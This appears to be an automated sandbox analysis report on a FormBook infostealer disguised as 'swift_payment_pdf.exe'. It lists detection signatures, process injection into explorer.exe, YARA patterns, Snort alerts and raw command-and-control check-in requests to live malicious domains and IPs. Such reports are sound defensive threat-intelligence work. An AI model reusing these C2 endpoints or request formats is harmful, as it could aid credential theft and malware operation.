Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
swift_payment_pdf.exe

Overview

General Information

Sample name:swift_payment_pdf.exe
Analysis ID:1467534
MD5:8e32f87b4f51fac392122d3c43b2e54f
SHA1:ac11a7300dbec0d2b67e549b97d3a1ab4e30c94a
SHA256:e7c888a111eeb26eec94afc97e0f9b838fda41ab74e083cb5b94f06800890d2d
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • swift_payment_pdf.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\swift_payment_pdf.exe" MD5: 8E32F87B4F51FAC392122D3C43B2E54F)
    • swift_payment_pdf.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\swift_payment_pdf.exe" MD5: 8E32F87B4F51FAC392122D3C43B2E54F)
      • AbWHWpocGREf.exe (PID: 5596 cmdline: "C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • explorer.exe (PID: 7980 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • AbWHWpocGREf.exe (PID: 2032 cmdline: "C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8156 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ac30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x142df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2e043:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x176f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.swift_payment_pdf.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.swift_payment_pdf.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x168f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.swift_payment_pdf.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.swift_payment_pdf.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e043:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x176f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:07/04/24-12:36:18.264786
            SID:2855465
            Source Port:60623
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:36:10.661734
            SID:2855464
            Source Port:60620
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:35:55.019985
            SID:2855465
            Source Port:60619
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:37:07.168398
            SID:2855465
            Source Port:60631
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:36:31.720572
            SID:2855465
            Source Port:60627
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:37:13.031456
            SID:2855464
            Source Port:60632
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:37:25.721255
            SID:2855464
            Source Port:60636
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:37:54.731409
            SID:2855465
            Source Port:60643
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:37:28.307762
            SID:2855464
            Source Port:60637
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:36:13.202756
            SID:2855464
            Source Port:60621
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:36:26.653593
            SID:2855464
            Source Port:60625
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:37:46.701989
            SID:2855464
            Source Port:60640
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:36:24.114076
            SID:2855464
            Source Port:60624
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:37:49.265901
            SID:2855464
            Source Port:60641
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:37:20.644937
            SID:2855465
            Source Port:60635
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:37:01.781228
            SID:2855464
            Source Port:60629
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/04/24-12:38:00.723849
            SID:2855464
            Source Port:60644
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: swift_payment_pdf.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.cheapdesklamp.shop/9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaLAvira URL Cloud: Label: malware
            Source: http://www.cheapdesklamp.shop/9nq7/Avira URL Cloud: Label: malware
            Source: https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRAvira URL Cloud: Label: malware
            Source: http://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaLAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: www.enrich-pet.comVirustotal: Detection: 5%Perma Link
            Multi AV Scanner detection for submitted file
            Source: swift_payment_pdf.exeVirustotal: Detection: 26%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.swift_payment_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.swift_payment_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3554688554.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3556641408.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3554923179.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2253540662.0000000001270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3554626493.0000000004640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2254428073.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: swift_payment_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: swift_payment_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: explorer.pdbUGP source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: iDIX.pdb source: swift_payment_pdf.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AbWHWpocGREf.exe, 00000006.00000000.2178286710.00000000001CE000.00000002.00000001.01000000.0000000C.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318584238.00000000001CE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: iDIX.pdbSHA256 source: swift_payment_pdf.exe
            Source: Binary string: wntdll.pdbUGP source: swift_payment_pdf.exe, 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2255178706.0000000004DF1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2253539982.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: swift_payment_pdf.exe, swift_payment_pdf.exe, 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000007.00000003.2255178706.0000000004DF1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2253539982.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: explorer.pdb source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_02F0BF90 FindFirstFileW,FindNextFileW,FindClose,7_2_02F0BF90
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 4x nop then xor esi, esi5_2_00418530
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then xor eax, eax7_2_02EF9770
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then mov ebx, 00000004h7_2_04DF0548

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60619 -> 34.149.87.45:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60620 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60621 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60623 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60624 -> 116.213.43.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60625 -> 116.213.43.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60627 -> 116.213.43.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60629 -> 172.80.82.186:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60631 -> 172.80.82.186:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60632 -> 194.195.220.41:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60635 -> 194.195.220.41:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60636 -> 162.0.236.122:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60637 -> 162.0.236.122:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60640 -> 52.1.217.30:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60641 -> 52.1.217.30:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:60643 -> 52.1.217.30:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:60644 -> 23.226.70.194:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.tofcomy.xyz
            Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
            Source: Joe Sandbox ViewIP Address: 34.149.87.45 34.149.87.45
            Source: Joe Sandbox ViewIP Address: 162.0.236.122 162.0.236.122
            Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
            Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
            Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL HTTP/1.1Host: www.enrich-pet.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jdip/?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL HTTP/1.1Host: www.alanbeanart.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /d8kh/?LtQxGF=Dj9s4sQnIR+vsDnKwlk6Nlhqw7itdOFaW/ig+XnRtKCOHSdW0TDTG1cm2v2szq88ld3O918FFXWQyjmpenJ9MCf4z9ns+SbMecfFG1uyoV1oJcUCPfEdpdE=&tDVH=AxaL HTTP/1.1Host: www.qaronvc.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rlze/?LtQxGF=aIyAcRArRtIGvQhfdflYxlfrxIZLeHRFwP1NsuYwxTNgARVeV6obq7xFZv4/a30th0BoYK05fy/0IwAkOE+OBI8+L6UIixinPDwn66JMG/Wbc84G9m2CbnU=&tDVH=AxaL HTTP/1.1Host: www.piqia.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaL HTTP/1.1Host: www.cheapdesklamp.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /gw8h/?LtQxGF=zGt49IFm93SrBWz0hF/Exo3fFaLGg1tTuVJPwAsKzCbkUXUSx9Ko4qRJeqPE/lbiWQNCjazmLjusy2a3r/X1USIwM3t9fhEbscmQM7mJ8GSckJYgF9Mlv0Q=&tDVH=AxaL HTTP/1.1Host: www.tofcomy.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc=&tDVH=AxaL HTTP/1.1Host: www.wwfglobal.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.enrich-pet.com
            Source: global trafficDNS traffic detected: DNS query: www.alanbeanart.com
            Source: global trafficDNS traffic detected: DNS query: www.qaronvc.lol
            Source: global trafficDNS traffic detected: DNS query: www.piqia.top
            Source: global trafficDNS traffic detected: DNS query: www.cheapdesklamp.shop
            Source: global trafficDNS traffic detected: DNS query: www.tofcomy.xyz
            Source: global trafficDNS traffic detected: DNS query: www.wepayassessments.com
            Source: global trafficDNS traffic detected: DNS query: www.wwfglobal.com
            Source: global trafficDNS traffic detected: DNS query: www.chefmikesrecipes.com
            Source: unknownHTTP traffic detected: POST /jdip/ HTTP/1.1Host: www.alanbeanart.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.alanbeanart.comConnection: closeContent-Length: 203Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheReferer: http://www.alanbeanart.com/jdip/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 4c 74 51 78 47 46 3d 62 30 79 34 68 63 6a 54 51 4e 42 54 46 50 4c 72 33 63 4b 50 73 48 61 62 78 39 59 52 37 65 38 62 59 30 6b 4d 57 6c 45 43 59 37 34 69 47 65 48 50 4c 31 4a 49 6e 53 2b 36 73 79 56 6c 62 6f 35 58 49 50 57 34 48 54 38 59 61 45 64 42 47 47 54 51 67 77 62 68 6d 44 51 41 30 56 51 42 6f 31 46 70 6b 57 72 64 56 44 4f 49 43 4b 57 58 33 69 45 77 2f 6c 62 6b 6c 74 61 50 34 63 63 52 57 73 67 56 43 6f 45 47 53 33 43 57 48 47 47 32 37 32 73 36 41 55 39 57 38 36 52 71 6b 76 46 36 46 4e 6a 46 64 73 71 37 47 42 32 71 38 6f 2f 42 45 64 76 71 6f 50 35 79 2b 4b 59 34 70 46 52 54 73 61 47 57 4e 77 3d 3d Data Ascii: LtQxGF=b0y4hcjTQNBTFPLr3cKPsHabx9YR7e8bY0kMWlECY74iGeHPL1JInS+6syVlbo5XIPW4HT8YaEdBGGTQgwbhmDQA0VQBo1FpkWrdVDOICKWX3iEw/lbkltaP4ccRWsgVCoEGS3CWHGG272s6AU9W86RqkvF6FNjFdsq7GB2q8o/BEdvqoP5y+KY4pFRTsaGWNw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=UTF-8Server: Microsoft-IIS/7.5X-Powered-By: PHP/7.4.6Date: Thu, 04 Jul 2024 10:37:07 GMTConnection: closeContent-Length: 1611Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 77 77 77 2e 70 69 71 69 61 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 22 2c 20 e5 be ae e8 bd af e9 9b 85 e9 bb 91 2c 20 54 61 68 6f 6d 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 2c 53 65 67 6f 65 20 55 49 22 2c 20 41 72 69 61 6c 2c 20 53 54 48 65 69 74 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0d 0a 2e 74 6f 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 36 36 63 63 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 41 2e 6c 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 36 66 36 66 36 66 7d 0d 0a 41 2e 75 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 67 72 65 65 6e 7d 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 0d 0a 75 6c 7b 6d 61 72 67 69 6e 3a 31 65 6d 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 30 30 39 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 65 66 65 66 65 66 3b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 7d 0d 0a 23 6d 65 6e 75 7a 61 66 64 37 63 20 61 2c 23 73 65 72 76 65 72 20 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0d 0a 2e 6f 6c 7a 61 66 64 37 63 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 7d 0d 0a 61 7b 63 6f 6c 6f 72 3a 23 30 30 66 3b 7d 0d 0a 2e 63 6f 70 79 72 69 67 68 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 2d 35 30 30 70 78 3b 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 62 3e 77 77 77 2e 70 69 71 69 61 2
